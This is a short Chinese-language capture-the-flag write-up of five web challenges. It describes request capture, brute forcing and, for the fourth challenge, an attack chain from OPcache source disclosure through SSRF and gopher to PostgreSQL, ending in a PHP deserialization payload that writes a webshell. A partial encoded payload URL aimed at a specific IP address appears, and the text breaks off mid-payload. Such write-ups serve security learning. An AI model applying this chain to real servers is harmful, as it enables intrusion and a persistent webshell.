一、Web类(共五道题)1、Web1拼图得到flag!反正踩点进去web是无法访问的,过了接近30多分钟才开放web页面访问,就有人1分58秒交了一血... 2、Web2查看静态代码得到隐藏路径 BP抓包访问得到提示: 构造请求包得到flag:3、Web3动态flag,需要自己跑flag,通过BP抓包,把0设为变量,用报错的文件去爆:按照图一步步操作就行,简单爆破即出。 4、Web4访问题目phpinfo.php发现开启了OPcache,通过cache得到源代码,发现存在ssrf漏洞,通过利用ssrf读取发现安装了psql,通过rce 反序列化构造连写入webshell!!这个URL参数包含了一个名为ORZ的PHP类对象,其中url属性为空,而value属性包含了一个Gopher协议的URL字符串,可能包含一段经过十六进制编码的恶意Gopher Payload。反序列化链条构造:http://111.74.9.131:10147/?orz=O%3A3%3A%22ORZ%22%3A3%3A%7Bs%3A3%3A%22url%22%3BN%3Bs%3A5%3A%22value%22%3Bs%3A8
………………………………